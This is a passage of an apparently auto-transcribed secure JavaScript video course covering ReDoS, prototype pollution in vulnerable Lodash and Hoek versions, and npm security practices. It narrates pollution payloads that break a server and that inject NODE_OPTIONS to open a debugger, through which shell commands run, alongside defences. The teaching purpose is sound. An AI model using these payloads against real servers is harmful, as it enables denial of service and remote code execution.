asserts the position at the start of the line. And we would get what we want. Now let's say I just want the last 3 characters of the whole string. I would use the $sign at the end, and it will say assert position at the end of the line. So we've got a match on RLD. That's already a lot, but there are a few extra things to know. You can also have dots that matches pretty much everything that is not a white space. Matches any character except for line terminator. So it actually matches everything. And the star is the equivalent of 0 to infinity, meaning matching any character between any number of characters between 0 and infinity. Let me just check my notes quickly. So here it is for a quick crash course about regular expressions. As an exercise, let's try to match all the words that start with W. So we would do W. Then we want the rest of the world, A, Z, plus, and here we will match all the words starting with W. So ABC. Ooh. And here we need at least 1 character after W. If I want to accept add any number of characters I want, I will do that. So let's show an extra word. Yeah is not in it, but what is in it? We are matching all the lowercase words with W. So now let's try to put a capital W. It doesn't match. So we have 2 solutions. Either we put an OR statement. We can't do that with a bar. Or we can add the flag insensitive to tell it not to care about the case. Okay, so we even know now how to do alternatives in our cases. That's it for this crash course about how to use regex in JavaScript. There are a lot of other things, but here are the bases that you need to understand the security implication of that in the next video. Thanks so much for watching this somehow a bit too long video, and see you soon, hopefully in the next one. Have a great day. Hello and welcome to Secure JavaScript Programming with Vladimir.Turkhem. If you are here, I expect you have seen the previous video about regular expressions. In this video, we will see how a regular expression can bring to a denial of service. This is an attack or a bug known as regular expression denial of service or REDOS. Actually, computing the result of a regular expression against a string, whatever the method used to do that, is a synchronous task, meaning it takes place in the current thread and blocks it. The thing is, JavaScript is a single-threaded language, meaning that you can do only one thing synchronously at the same time. Of course, you can use worker thread, web worker or service worker to parallelize, but by default you will be in your single thread. That's why JavaScript has so many awesome asynchronous API, because otherwise it will not be able to do things concurrently. The principle of redos is that a regex is currently blocking the main thread and prevents the script from doing other things. One easy way to actually test redos is on Node.js. So let me show you a small server I built. That's a server. You put a string at the end of the URL. So let's say hello world. Oh, it's better when I start it. Hello world, and it tells you that the last word of this sentence is world. If I do hello, it will tell you that it is hello. And if I do hello world of JS, I promise that's what's here. If I remove the encoding, Chrome is great, but not always when you're giving online courses. Well, it will return last word JS. Now, let's do something where we put the string a. Okay, so far so good, it detects the string. But let's put an invalid character at the end. It tells us invalid string because it doesn't want any special character. But let me add a few A's. Okay, so far so good. So far still so good. Okay, you see it starts to take a bit more time to compute, and now I have added some A's and it takes much more time to respond. Let's add even more A's. And right now the server is blocked. If I want to call on just A, it is not responding. The server is blocked. It cannot respond because the main thread, the single thread, is currently blocked by a regular expression taking a very, very, very long time to run. Let's just give it a few more seconds, but I don't expect that to stop in a decent course of time. Okay, so let's say you're facing that, either in the browser, either in a Node.js application, and you don't really know that there is a regular expression in your path. You just see something going very slow and blocking everything. Well, there's actually a good method for testing for this. It's you use a CPU profiler. So I will start the Node server with -- inspect. And that's actually just is the equivalent of opening the dev tools on a web page. So right now my server is running, and I will go on Chrome /inspect, and I will get the dev tools for this server. If I was to debug that in the browser, if I was trying to debug something in a browser, I would just click inspect and I will get the same dev tools. So right now I am connected to my Node.js instance. So if I do console.log hello, it will actually also log here in my process. You have multiple tools here you can use, and the one we will use is profiler. So we click on start CPU profiling, and now we can run a few of the calls. And let's have the one that fails. Of course I lost it. Okay, this one was too short. This one is long and very blocky and very buggy. So it takes ages to run, and our CPU profiling is still going on. Let's stop CPU profiling, and we see that we have a view where it tells us the things that took time. The first view you need to be familiar with when you do CPU profiling is actually the tree view. This view actually lists the function calls in the order they happened. So you can zoom on something with the scroll, and here you see an HTTP request getting into the app that calls the method parser on header complete. Then it calls the app method, which is actually in the Express framework the thing dispatching the request. Handle, we see some next, that are the next you pass as parameters in Express. And then we can go down. We see some JSON parsing. And we see the socket.write for the response. Okay, but this one was not actually a problematic call. This one, as you see, look at the top, we see that we've got a bigger chunk. We call that an island of code. Here we see our call to app handle, and all of that means the function app called the function handle, that called the function handle, that called next, that called the function process param, that called an anonymous function, and you see the time taken by all function. And by default, a parent function time, execution time, is its own compute time plus the compute time of its children functions. So in our case, the function named getLastWord. That's weird. And here we have the top of the stack, the top of the island, which is actually the part that is responsible for our application being in a state of denial of service. Let me just add myself a bit. Here, V8, the debug tools are very nice because they even tell us which regex is actually responsible for all of that. This view makes sense if you want to check things on a special time frame. But if you want to see aggregated time, you can go to bottom-up. Bottom-up will sum the time spent calling the same function again. So all control calls have been actually summed to obtain half a millisecond. That's why it's called total time. So if we get it by total time, of course we've got the program at the top. We've got a lot of functions because functions are longer when their children are longer. But we can see that we find back this regex, and V8 even tells us which regex it is. And by clicking on it, we can have the call stack to know why it has been called. Okay, that doesn't help us that much, but if we click here on the part that looks like a stack trace, it actually takes us directly to the code of the server and enrich that with call time. So I'm not sure why these ones are not 40 seconds, but here they are. So this tooling enabled us to identify that there was a single reason for our application to be slow. Here in our case it's a regex, but that could be, for instance, JSON parsing. Recently someone contacted me and told me, hey Vlad, my Node.js application is really slow, it looks like it's about Redis. Redis being asynchronous in its Node.js API, it was unlikely, but they were actually storing huge JSONs directly in Redis. So where they were losing time is when they got the JSON as a string from Redis and were passing it. And by using the CPU profiler, they were able to identify that it was a single JSON.path call that was actually responsible. Sorry for this small digression. Let's go back to regex. So the question is, why is this regex so slow? Well, this regex actually contains something that's called catastrophic backtracking. It means that there is a double repetition that actually makes the algorithm, the regex algorithm, very slow because it has to loop over and over on all items. And when it loops, it takes actually an exponential growing time to compute it. So let me give you an example. Let's take 4 A's and the dollar sign. It tells us no match, 0 milliseconds. If I add a few A's, still 0 milliseconds. I add a few A's, I get 1 millisecond to match. I add one extra more, still one more, and I added one more and I went from 1 to 3 milliseconds to match. I add one more and I went to from 3 to 7, 7 to 13, 13 to 26, we doubled this time, 26 to 48, 93, almost 200 milliseconds. Let me add a few of them. It takes time. Okay, it timed out. If I reduce, what's the higher we can get? I won't be better than 200 milliseconds, I think. So the issue in this regex is that it's matching words without special characters. And here, because of this double capturing group, it has to try all the possibilities in that string. And because it has to try all the possibilities, adding one single character actually grew the number of things by a factorial principle. So either I remove the bad part in the string and the catastrophic backtracking is not enabled. That's not a regex that is condemned to be bad. It depends on its input. Either I move to, for instance, another regex engine, the one from Golang, named RE2, actually is not vulnerable to catastrophic backtracking at all. And the good news is that it's slightly being ported to V8 and will soon be available in Node.js and Chrome. Okay. What are the ways to protect yourself against catastrophic backtracking? Well, maybe one of the first solutions is to know about it. So there's a module named Redos. It's a very old one, and I would not recommend using it. I would recommend you use Safe Regex, but Safe Regex doesn't have a CLI, and that does what I want. So I will just show you what I want with Redos. I install the Redos module locally. I go to node module, bin, Redos. Why isn't it here? Oh, forgot to save it. Node module, .bin, Redos, and now I say server.js. And here it actually detected through static analysis that this regex might be dangerous. Actually, the safe regex module by my good friend Jamie Davis is much better for this kind of thing. Another thing you can do is to use a very handy hack. This one is for Node.js only. There's actually a way to limit the execution time of a synchronous block of JavaScript code. It's like a very super secret feature of Node.js, but you can use the VM class to run an arbitrary script. And when you call run in V8, you can in VM module, you can pass an option object that has a timeout value. And this timeout value will actually be able to block the execution of a synchronous chunk of JavaScript code. The last way to actually protect against Redos injection, is to not use regular expressions. So either never write your own regular expressions. That's currently the position from Sneak. They tell you you should not write regex yourself. Either you can find a way to not even need regex. So here, the goal of this is to find the last element in a string, the last word in a string. Well, another solution would be to do const split equals split str.split. Then you put this, and then you pop. You get the last one. So you have the last word, but you want to make sure it doesn't contain a special character. Well, in that case, you just do regular expression equals this. you don't get the double thing. You are actually sure that this is already the last word in the sentence, the last set of characters in the sentence, because you split on a white space. And I showed you could split on a regular expression, but you can also split on a substring. And then you run this much simpler regex that checks that you are on the right alphabet. And here you removed a vulnerability to regular expression denial of service. Thanks so much for watching this video. There are a few very important parts into it. First of all, don't trust regular expressions. Secondly, you try to avoid them as much as you can. Thirdly, if you have a performance issue, the good way of fixing it, of detecting it, is not to try stuff, it's to open the CPU profiler. This is the tool design that will tell you the quickest where your problem in performance stands. I hope you enjoyed this video. Thanks so much for watching it, and see you soon in another course. Hello and welcome to Secure JavaScript Programming with Vladimir.Turkem. This video is here to explain you what is prototype pollution and how to protect against it. Prototype pollution is one of the fastest growing vulnerability in the JavaScript ecosystem and in the programming world in general. Between 2018 and 2020, there have been more than 96 CVE entries for prototype pollution. It's a very, very nasty bug. We will see in the next course how it can be used to obtain, for instance, remote code execution. But in this video, in this current course, we will mostly focus on how it works. Okay, so if we check the list of CVEs here, we can see that there was one on Lodash for version before 4.17.11. Lodash is actually an extremely popular JavaScript library for Node.js and the browser. Literally thousands of websites use Lodash and thousands of backend applications use Lodash. Only for the NPM version, it's downloading 43 million times a week. That's huge. We can see that the versions before the patch, I remind you that the patch was for 4.17.11, those versions before the patch are still insanely popular. Let's just take 4.17.10. It's downloaded 500,000 times per week. Same thing for 4.17.4. So we've got more than 1 million and much more than 1 million or 10 million download of vulnerable versions of Lodash every week. Despite these versions being published years ago, people still download them. So what is this vulnerability in Lodash? Well, we will see it in Lodash and in another package that is also a util library named Hook. So let me npm install. As you can see, I have taken Lodash in a vulnerable version. Same thing for Hook. And now we've got our dependencies that have been downloaded. So on Lodash, we will for now focus on these 3 lines of code. Here we've got console.log, a.hasOwnProperty. HasOwnProperty is a standard method in JavaScript to check if an object has a own property with a given name. And then we will call lodash.merge, the empty object, our attack payload, but we will see that later. And that's it. And now we will run exactly the same line. We will do the log of a.hasOwnProperty. So let's run this script really quick now. We can see that before we ran lodash.merge, we had a function as a.hasOwnProperty. After, it became a boolean. The function has own property has been replaced by the boolean true. So what happened? At the first line of this code, we require Lodash, and we have it in the underscore variable. That's the convention with Lodash. Then we have a malicious payload as a string containing a JSON. The value is constructor, prototype, has own property, true. We create our object, A, and we log what we want to log before calling Lodash. Then we call Lodash.merge on an empty object. It can be any JavaScript object, actually, for this attack to work. And as a second parameter, we pass JSON.parse, the malicious module. Okay. What happened? The bug in Lodash overwrote the value of has own property on the global prototype of all objects in the JavaScript heap. I know that's a bit complex to get, and the rest of this video is about showing you another example of that, explaining in detail what is prototype pollution and how is it related to prototype inheritance, and we will check under the hood a library. Then, at the end of the video, I will show you multiple ways to protect against this attack. So here we've got another library. We do the same. We create an A object. We show the value for has own property. We do something else, which is exactly the same. Hug.merge empty object, parsing another payload, and then we show that the property has been replaced by null. If I wanted to show you exactly the same thing as the Lodash example, I probably should put true in my malicious payload. In that case, we didn't go through overriding the value of constructor.prototype. We went through overriding the value inside proto, because those two libraries had the same vulnerability but under different kinds. So the payload need to be built for the library. Okay. So before we go under the hood into the Lodash part, into the hook function, I need to do some refreshers on prototype inheritance. So let's say that I've got a class A that has a constructor. I don't know why WebStorms wants the default to be like that. And let's say this.a equals 1. Then on this class A, we will create a method, say hello. And in this method, we will just write console. Sorry, I've got like some happy linter things. Console.log hello. Now we will create another class, class B, that inherits from A, meaning that all objects that are created through the class B will have the prototype of the class B, but this prototype will have as a prototype the class A. We will see that in detail. So extend A, constructor, come on, constructor this.b equals B. What did I do wrong? I probably have a typo in constructor. No. What happened? Yes, I forgot the super call. Not the Super Bowl, the super call. Then we will have a say hi method. Up, console log hi. And then we will create one last class, which will be C. C extends B. You know the drill. Constructor this.c equals 3. And that should be 2. let's try stop being a terrible developer myself. Now we will create a new instance. C. Then we console.log what's inside C. And we do c.sayHi, c.sayHello. If we run this code, without any surprise, we will have an object, C, which has the value A1 coming from the class A, B2 coming from the class B, and C3 coming from the class C. It also has a method named sayHi and sayHello. So let's see exactly where in the JavaScript object these are present. So let's explore the C object. We see that the three properties, A, B, C, are directly on the object. However, the sayHi and sayHello method are not on the object itself. It's maybe on the prototype. Well, we check that. It's not directly on the prototype. It is on the prototype of the prototype. So let's understand. This value for proto is actually the prototype of the C class. And the C class does not have any method. However, the prototype of the C class is the prototype of the B class. And the prototype of the prototype of the prototype of the C class, or in other words, the prototype of the B class, is the A class prototypes. So when we code C.sayHi, the algorithm under the hood will do either a method named sayHi directly on the C object. Is there a property named sayHi? So it would look like has own property sayHi. It returns false. Okay, so now it will check c.proto. Does it has a property named has sayHi? Still not. So it will go one step up and check on the prototype of the prototype. And now it's available. That's why it returns true now. But if I write sayHello, it's still not there. But I can find it on the prototype of the prototype of the prototype. An interesting thing is that if you go really up into the prototype chain, you actually end up with a common prototype for the class object, and all objects in the JavaScript heap inherit by default from this prototype. When you do a prototype pollution, you actually pollute with an arbitrary value something in the prototype chain. Either it will be on a class, either it will be directly on the global prototype. So let's see how it works under the hood, because prototypes are just objects. So remember the hook one. I actually extracted the merge function from hook. It was easier to do than the merge function from Lodash. So we've got a method isObject that basically checks if something is an object. Basically, it has a constructor, and this constructor is object. And we have the merge function. What it does is that it loops on the properties of the source object. We want to merge a source into a destination. So we loop on the prototype of the properties of the source object. And for each of them, if they are an object, we actually recursively go up into the function. Otherwise, we assign the property from source on the destination. And that's pretty much where it happens, because if you put __proto, well, it will just take the value of proto here and say, oh, it has a value of proto, and the source and the destination both have proto, which is an object. So I need to merge the content of the proto from the source to the destination. So let's see that in detail. Let's just first of all check this. Here you can see that I have another payload that will add an environment value as an object on all elements. So here I log new object.env. Keep that in mind, that might be useful for the next video. So recursively, this function will actually add properties to the prototype. So if we check, sorry, wrong command. If we check the value of new object here, we can see that probably something better to do. Sorry. Let's do it this way. So if we check the value of x here, we can see that this is an object. It has no env property, but on the prototype, on proto, and on the prototype of all new objects now, there is an env property that has the value we maliciously added. That's how prototype inheritance can lead to prototype pollution. So one legitimate question you may have is that why is it always coming from a JSON.path? Well, there's a reason. We will check it here. So if I check the value of x, and I will do something like that. That's the secret and why those examples are always using JSON.path. Here I have x and I forced a value of proto. Well, you can see that it has just been ignored. That's it. It has been ignored when you define an object with a value proto like that. However, when you do that with prototype with a JSON.path, because of the internal of JSON.path, it has created two properties named proto and the object. That's a very edge case of JavaScript that was exploited here. Okay, so now how do we protect ourselves against it? Well, because it's due to prototype stuff, one way we could start replacing a would be to do const a equals object.create null. This method actually creates an object which has no prototype, because object.create creates an object from the prototype passed as an argument. So if we have the prototype null, well, we are not vulnerable to prototype pollution because we don't have a prototype. However, we won't benefit from these methods. But that's it. Another way to get to the same result without rewriting the object would be right after creating the object, use object.setPrototype of a null. That gives the same result. We will set a null prototype on it. One third solution, but this one might break some other stuff in your code, is to freeze the prototype. So we can do a.proto. In that case, the value of the prototype is frozen, and rewriting over it is either ignored, either through an exception, depending if you are in strict mode. Last but not least, we could totally not use a and replace a by a new map. In that case, of course, we are still vulnerable to prototype pollution on A, but we wouldn't use method from the global prototype chain, because we would use a.has, which are method on the map class, not on the global prototype. So we would not be vulnerable to actually using those methods. For the story in the Node.js internal, because I'm a Node.js contributor, we've got safe methods that have been frozen on their prototype for the internals of Node. Sorry, this was a very long video, but thanks so much for staying till the end. Prototype pollution is one of the most dangerous vulnerability in the JavaScript world right now. And please come and watch the next video when I will show you a live exploitation of a vulnerability to get a remote code execution on a Node.js application vulnerable to this. Hello and welcome to Secure JavaScript Programming with Vladimir.Turkem. This video is about exploiting a prototype pollution. We have a prototype pollution on a Node.js server, and we will exploit it in two ways. In one way, to obtain a denial of service. This one will actually make a lot of sense for things that happens also in the browser. And we will also use an exploit that has been found in an older version of Kibana and reproduce it on another app to show how prototype pollution can lead to other results than denial of service. Okay, so let's not go through the source code for now and just check our app. We've got an application which has two endpoints. One endpoint is fibo/number, and actually you give it a number and it returns the nth number of Fibonacci. So fibo de 7 is 13. Also, it has another endpoint that is items, that is a post endpoint that will be used to insert item into a fictional database. For instance, hello world. And we have something with a timestamp, an ID, and it's inserted into a database. Okay, so let's start with the fun thing. If you remember the previous video about prototype injections, and if you haven't watched it, I recommend highly you watch it before the current one. As you remember in the theoretical video for prototype pollution, the main way to get a prototype pollution is through something that will be json.parsed. So we are lucky here, we've got an endpoint that takes JSON as input. So let's try already a first prototype in pollution. We will pollute the prototype and we will actually overwrite some methods on the global object prototype. So has own properties. Let's put null here. And let's do the same for has own property. Probably better if I write it properly, null. And let's do set prototype of. That's how a hacker would do. They would just run multiple ones and see if one of them goes through. Okay, so we have run that once. And sorry about that. And if we run it again, we actually get an error. Okay, let's try to run that with a legitimate payload. We still get an error. So whatever we run on this endpoint now results in a 500 server error. We have actually broken a code path in the app. If we test a Fibo number, it will still work, but this code path for each item insertion has been fully broken, and we are in a state of denial of service. It can also happen in a front-end application if you are able to prototype pollution and break some original methods of the JavaScript language. Well, the application won't be able to do some stuff. So for instance, if you remove the methods that are used to write on the DOM because you have access to the right prototypes through your pollution, well, you would break actually the DOM for someone. All of that based on a json.parse and a merge. So let's see how we broke the object upload endpoint of this app. Let's just check the code. Let me kill it and restart it just for later use. Or let's even go to debug. So what happens? Here we've got the endpoint for uploading files. It's here. It just calls a method named storeInDB, takes the body and pass it to the method, and if there is an error, returns an error, and otherwise returns the item that has been inserted. So let's check the content of storeInDB. It calls getID. GetID basically returns an ID. So we get an ID for the item we want to insert. And as mentioned, this is like a virtual database, so the ID are just created by incrementing them, and instead of actually writing something in the database, I just added like virtually insert. So if we check the code, there's a method that checks that the item already doesn't have an ID to prevent collision between that and an item that might already exist in the DB, and in that case would return an error. Okay, so what it does is it creates the timestamp, the ID, put that on an object, and then merge the item we got from the HTTP request and the object we want to insert in database, and return that as a callback in the callback function. That's pretty much it. Hook.merge, as we have seen in the previous video, is vulnerable to prototype pollution. So let's put a debug point here and rerun immediately our malicious part. Not that one, should be this one, yeah. So here, when we check what's merged, we see that this object has two proto properties. So that's the kind of thing we got when we had the side effect of the prototype pollution, or at least of passing an object with a proto entry, a JSON with a proto key. And it has on properties null, has on property null, set prototype of null. Here, the prototype pollution, as explained in the previous video of that course, first video about prototype pollution, actually removes the has-on property method from the global prototype and replaces it by null. And that's it. So the error we got next time is each time we run something on this endpoint, what we get is this throws an error. And Express catches this error because we are in a synchronous programming error flow. If we uncomment those two things, because of the way JavaScript works, because JavaScript is single-threaded, each time there is an asynchronous operation, the stack trace is lost. You cannot know from the code, except when you read the code as a human being, but the engine v8 can't know where the asynchronous operation comes from if it's not a promise chain. So in that case, when we uncomment the process.nextTick, we have an asynchronous operation, and the error cannot be caught by a try-catch anymore. So if I rerun the server and run the prototype pollution, let's run the prototype pollution, and then I rerun a query. This time, actually, the server crashes. Because of the asynchronous operation, it was not able to find the stack trace and then to find the right try-catch. But that's a detail in our case. What we are interested in is prototype pollution. Okay, that's already pretty bad. But now let's try to do something even more nasty. So I will run a payload that goes that way. And now we see that, nothing has changed. But when I get on Fibo/10, well, now I get an error because that's a get endpoint. Okay, that's not the one I wanted to do. I wanted to do BRK. Sorry about this. So now it just hangs. It should just hang. What's happening? Node option. Yes, okay, I'm not on the right endpoint. So let me start again. If I do my post with my prototype pollution with inspect brk, nothing changes, slash items. And now if I get on slash fibo slash 10, it just hangs forever. And if I check what's debuggable locally, I can see that I have actually the ability to debug a target on my machine. So I open it, and when I am on this debugger, basically I can do whatever I want. So for instance, I will do require child process, and then I will do exec sync, and then I will do ls, and I will add a toString because I'm a nice person. And basically, we are actually running command through the debugger on the target machine that's running the server. But that case is not actually really realistic, so let's just go through this and disable the debugger. And now we've got the result. So what happened? Well, we ran a prototype pollution that created a property node_options on basically all objects inside the application. So all objects, if you ask for node_option, it will go up the prototype chain and find that the value is inspect break. Okay, so when we compute a Fibonacci number, in this case, what we do is we actually run a child process. That's a hack that's usually very used in Node.js for CPU-intensive operation. You spawn a child process or a worker thread on the most recent version of Node.js. In that case, well, the process is spawned with what's inside process.env as environment variable. And there is a special environment variable in Node that is node option that can be used when you want to pass command line parameters to Node. Like if I want to start Node with the debugger, I can do either node -- inspect exploitable.js inspect node. I had too many dash and it opens with the debugger. But if I want to do node options equals -- inspect and I remove this, it doesn't work because I probably forgot a S and options. You know, that's called the demo effect. And now it starts the debugger. So when you start the node process, it actually, the child process to compute the Fibonacci number, it will actually look for the value into node option. And since we had put inspect break, which opens the debugger and wait, that's how we started the debugger. We could also have used something else like -r and I would say log.js. And let's restart the server now because it's broken. Let's run that in a post command. Okay, and now when we compute a Fibo number, it doesn't work because it cannot find logs.js. So that's probably me who poorly wrote my exploit. Let's rerun it and see how it goes. And this time you see it writes hello world because we actually used a command in Node that requires a file before it reads, and we actually executed the content of this logs file that prints hello world. So the goal of this course and video is to show you that prototype pollutions can have a lot of effects. It changes the value you can expect from the JavaScript engine to give you, but it can go even further. Let's say when you have an administrator account, you put isAdmin on it, And if you don't have an administrator account, you don't put this value, well, a prototype pollution can be used to make all the user administrators. Let's say you have a front-end application. Well, the prototype pollution can be used to break it, because through a prototype pollution, you would disable some methods that are either used by your code or by your framework and make that inaccessible, replaced by null, and just crash in loops, and you have a denial of service and you don't have any business yet. Prototype pollution might be stored in a database too, if you remember, or if you will watch the course about stored XSS. Well, it's possible to store them in a database as long as it's something that will be JSON.parsed at one point. So remember what we said in the previous course. Freeze your objects. You can, if you use Node, there is a key to disable prototype pollutions altogether by freezing the global prototype and disabling proto. Use safe objects, maybe use map instead of dicts. Thanks so much for watching this video. See you soon in another one, and until then, take care of yourself. Hello and welcome to Secure JavaScript Programming with Vladimir de Turckheim. In this course, we will do some refreshers about NPM. Okay, I already hear you out. You might not be using NPM, but you might be using PNPM, CNPM, Yarn, or any other package manager. So in this video, we will more focus on the features of NPM, what security impact they may have, and how the whole JavaScript ecosystem works in terms of module management. So if you're not an NPM heavy user, you probably at least use the NPM package repository, and that's what we will see in depth. So before starting, let's create a repository on GitHub, or it can be anything actually. So we'll make it public so you can totally track it. Let's create a node git ignore. Let's put an MIT license in it, because why not? And an empty readme. So now that we have created it, GitHub is pretty happy. Tells us, hey, here you have a repo. So let's clone it locally. So up cd document infosec 2c07 project gets clone, then we put our URL, it's cloning, and now we can open our IDE directly inside the project. So give me a sec. That's where it goes. Up, that's screen recordings, and this window, and now we have the project, and WebStorm has opened the right page directly. So now let's start to do things with NPM. I open a terminal at the bottom of the screen, and I start by typing npm init. And when I do that, it starts to ask me questions. So the first things it wants to know is the name of the package I want to create. So let's keep npm demo. By default, that's the one it will offer because that's the name of the current directory. Now it wants a version, so let's do o.o.o because we are really humble. A description and some repo to showcase NPM features. We want a main part, let's do index.js, that's a convention, a test command. Let's ignore that for now, I will show later what it means. Right now, since we are already within a Git enabled directory, it will detect that there is a Git repository available, and it will even detect that it is a GitHub directory. So let's put a few keywords. Author, well, that's me. License, it asks for the license. Remember, on the repository we put MIT, so we have a MIT license file already generated, but by default npm suggests to use ISC. Is this okay? Sure. So now we see that a new file has been created. Let's add it to Git, and it's the famous package.json. So it has pretty much everything we said: a name, a version, description, entry point, no command for testing, but we will see that later. npm detected that it was a Git repository, so it actually took metadatas from the Git repository and put them here. That's pretty handy. Remember, I added 2 keywords. I separated them with a comma, and npm now put them in a list, which means if I publish this package on npm repository, they will be linked with these keywords. Author field is here, license field. Because it's a GitHub repository, by default, it will say that there is an issue page that is available and a home page as the README. So the first things we need to do now is decide if we want to publish this ever on npm. And I want to say, yeah, true. This is a private package. So if you want to make sure that your package is never publicly published, well, you want to put private here because it will prevent npm from uploading that to a remote server, and that's pretty handy. Now, another thing we want to do is to give news about the engine version, because this might not be targeting all Node.js versions. So let's say that we want to be at least 12.0.0. And now, if you install it with the lower versions of Node, well, it will complain and it will tell the user, you're probably doing something wrong. Are you sure you want to do that? It might not work. And that's like safeguards we can have to protect our package from being used with wrong versions of Node. Okay, so that's pretty cool. And now, as you know, npm is also used for package management. So historically, it used to say Node Package Manager, but not anymore. They decided it just standed for npm. And if you don't like that, complain to Isaac, the creator of npm. I'm sure he will be happy to have discussions of that. But npm doesn't stand for Node Package Manager anymore, just stands for npm. So now we want to add dependencies. So let's say we want to add the very famous web server Express, the web framework Express. We do npm install -- save Express, and that will install Express. For most npm commands, there are actually shorthand way of using them. So npm install can be replaced by npm I and -- save by -S. But since this is an online course, I need to show you the most verbose way of doing it. So let's do it this way. And now npm just does its magic of downloading a package. It created a node module directory where the dependencies are. If I want to list everything that has been installed, I can do npm ls, and it will list the installation of Express here. And we also have a package log.json. So usually, except if you build if you build a library that will be used by other people, if you build a final project, you want to commit and publish this package, this file. What does it contain? Well, it contains the hash of integrity for all the dependencies, which means that as long as this file is not tampered with, your dependencies are not tampered with. And installing something with a same version but a different integrity hash will fail and npm will protect you. That's actually very important if you want to protect yourself against supply chain attacks. That's a topic of another video of the use npm course of the secure JavaScript programming learning track, and we will see that in detail in this video. But as a rule of thumb, either that's an end project, you're handling going to prod with that, and in that case, well, you want to commit that and to make sure that it stays. Either that's a library, you're building a library that you will distribute, and in that case, don't commit it, or at least don't publish it. It will make the life of your end user very painful. Okay, so npm also allows to have dev dependencies. So if I do install save-dev, I can install the Mocha test library. I could shorthand this by npm I capital D for development. And now if I check my package.json, I've got a piece with dependencies and a piece with dev dependencies. As you can see, there is a little hat here. So what does it mean? Well, npm tries to enforce samver by default. So if you're never sure of what it means, you just go to npm samver calculator, you type the name of your package, and you put the range expression. And it will tell you all versions that are actually pinpointed by this. So if you want the exact version, you can type the exact version, but you can do a lot of things by playing with the samver range calculator by npm. So you need to be aware of that, because each time you do npm install, it will take the last updated version, of course, based on what's allowed by the package lock. It will take the biggest version that it's allowed to take. So make sure that you understand these range things, and you can definitely play with that. To be honest, I never know what to do, so I usually just use the samver calculator to make sure I don't miss stuff. You've got other ways of adding dependencies on npm. You've got npm peer dependencies. These dependencies are actually expected to be installed also by the end project. So if you want dependency A, it needs B, but it won't install B. You are responsible for installing B. Also, it has what's called bundled dependencies. This one is actually pretty interesting because it allows you to add specific dependencies that must be delivered with the package. So if you use bundle dependencies, you know that the package will actually contain, when published, the dependencies in an archive file. You also have optional dependencies that might not install for some reason, but that means that in your code, you know that it might not install, and you are okay with that. Usually using a try-catch statement around the import. When it's a require or a dynamic import, you won't be able to do a static import on that. Well, will actually enable you to have optional dependencies in your code. So let's try an example, and let's install the SQLite 3 package, and let's check what's inside this package. Ooh, I made a typo, SQLite, not SQLite. So it downloads, and we see in the console that it did some other things a bit more. It called something named Node.js. So let's go in depth in what this is. So if I go to SQLite 3, I open it and I want to open its package.json, and we can see a few extra fields that we are not used to. It has scripts. So scripts enable you to create specific scripts to run at some part of the life cycle of your project. So here we've got by default a script for test that just logs something. But let's do a script for hello. It's me. And now let's even do a script that we will name pre-hello. Hello. And of course it doesn't mean anything because I missed echo. Yeah, I'm on Unix. Up. Echo. So, and let's add a post hello. Sorry about that. Echo. Down. And now if I do npm run hello, it will first call the script named pre-hello by default. So it will say hello. Then it will call the script named hello, it's me, and it will call the script named post hello, which means that you can define different scripts that be called at different level. One interesting script to create is the one named install, which means each time your package is installed, this script will be executed. So in the case of SQLite 3, when you do install, it calls a script named Node.js to install a native dependency or download it from the internet. This is actually pretty dangerous because you can actually use that to attack someone by running an install script on their machines, and that happened in the past. So if you want to prevent a script from being arbitrarily run when you install, you would usually do npm install -- ignore scripts, and that will ignore the scripts from being executed. But some modules like the SQLite 3 won't work, and you will, because they will miss something at the install, so you will need to go in the modules and patch the install yourself. But at least you will be protected against malicious script running at install. There is one last interesting thing I wanted to show you here, is that in your package.json you can define a bin part where you define scripts. And that will actually enable you to build a special executable from that can be installed by npm with things like npm install general. But that's more npm in depth. The main security takeaways here are what I said about the package lock and the install scripts that you want to keep an eye on. Also, it's extremely important that when you install your project in production, you use the production flag. So let me show you something. I remove package lock and node modules because I'm a bit hardcore, and I do npm e-production. And what happens is that it will not install dev dependencies. And what you want to do is to install the slowest number of dependencies at any time. So if you install dev dependencies in production, you might bring vulnerable modules to your productions. Modules that are actually okay to have in dev mode, but not in productions. So here it tells me I don't have Mocha, and that's okay because it's a dev dependency. So make sure that this is clean in your repository setup and that you never install dev dependencies in production. Thanks a lot for watching this video. See you soon for more video about security of NPM ecosystem. Hello and welcome to Secure JavaScript Programming with Vladimir de Turkheim. In this video, I will share my tricks about the art of choosing the right NPM module. So let's say we want to resize images in a Node.js application, but that could be pretty much anything else. Maybe you want to choose the right module to do REST requests with your backend. Maybe you want the right module to do certain animation. Well, the way of doing that will always be the same. So here are my list of tricks on how to choose a module with this example of an image resizing one. So the first thing I do is I do image resizing node, or I say node or npm. And that actually gives me a few packages as GitHub results. And to be honest, I mostly use GitHub to find packages. But when I have identified the packages, the first thing I do is check them on npm directly. So this one, yeah, this one doesn't seem really good. Okay. So there are a few things to look at. And here we've got multiple modules that we have identified. We have image file resize, resize image, browser image resizer, GIMP, image resizing, and sharp. And the first thing I do usually is I sort them by popularity in the last week. So here we see that this one is downloaded 1.8 million times. This one 1.4, so it's probably the second most used. This one 3K, 100K, so probably the third one. This one is 4. So here we've got our order with sharp being the most popular and image resizing being the least popular. Image resizing has been published 4 months ago. Does it looks like what we want to do? Okay. It seems to take URLs. It doesn't really do what we want, and it's not fully used. I mean, it's like very, very unused. It has been around for only 5 months. It's probably not stable, so let's keep that for later. Image file resize. This one gives us more detail in the documentation at first. It's still not very downloaded. It hasn't been published in 8 months. Let's see the version list. Yeah, it doesn't seem really maintained anymore. So let's check the GitHub page to see how maintained it is. It has no issue. Only 3 of them have been closed. And the last issue is named not working. Other have been named confused. Probably not a great way to build applications upon. This one is already much more popular. Once again, let's see how many versions. It's been around for a few years. Let's open its GitHub page. Same thing for this one. It's been around for a few years. Last published was a year ago. So we want to check on this one if it is really maintained. Last commit was 2 years ago. Issues, there are issues that have been unanswered, probably something we want to avoid. And here we've got our 2 main containers. They have been around for years. They have thousands and millions of downloads. So they are probably less likely to get unmaintained or to turn rogue. So here we've got browser image resize, but actually the thing we wanted to do is to use that in a Node environment. So browser image resize, which is browser oriented, will go out of the picture. And now we've got GIMP and sharp, and we need to decide which one we will prefer between GIMP and sharp. So we pretty much know that both of them already do what we want, but GIMP has much more features. And that's the first decision that we need to take depending on the product we are building. If we know that we will only ever need to resize images, well, that's probably enough to use Sharp. If we need more things in the future, if you think the product manager will ask for more features, then having GIMP might be a good idea because you want to reduce the amount of dependencies you have in your project. As a rule of thumb, you want as few dependencies as possible in your project. So if you go with GIMP, you're sure that pretty much everything you will need to do in the future in terms of image manipulation will already be available. 